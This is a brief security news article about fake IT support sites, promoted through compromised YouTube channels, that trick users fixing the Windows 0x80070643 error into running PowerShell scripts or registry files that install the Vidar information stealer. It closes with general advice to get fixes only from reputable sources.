Fake IT support sites have been on the rise, promoting malicious PowerShell "fixes" for common Windows errors like the 0x80070643 error. These sites are designed to infect devices with information-stealing malware, preying on frustrated Windows users seeking solutions online.
Exploiting User Frustration
According to eSentire’s Threat Response Unit (TRU), threat actors are using compromised YouTube channels to add legitimacy to their fake support sites. These sites offer supposed fixes for the 0x80070643 error, which has plagued Windows users since January due to a Windows Update error message displaying incorrectly.
Microsoft explained that the error message is misleading, as it should indicate a lack of disk space in the WinRE partition. Expanding this partition manually is complex for many users, leading them to seek solutions online. This is where threat actors capitalize on the situation, offering fake fixes that ultimately install malware on devices.
The Mechanics of Deception
The fake IT support sites, such as pchelprwizzards[.]com and pchelprwizardsguide[.]com, guide users to run PowerShell scripts or import Windows Registry files that download malware onto their devices. Once executed, these scripts install information-stealing malware like the Vidar Stealer, compromising sensitive data and leaving users vulnerable to further attacks.
Protecting Yourself
It is essential to be cautious when seeking solutions online for Windows errors. Only download software and fixes from reputable sources to avoid falling victim to malicious actors. Remember, your personal information is valuable, and threat actors are constantly evolving their tactics to steal it. Stay vigilant and prioritize cybersecurity to protect yourself from such attacks.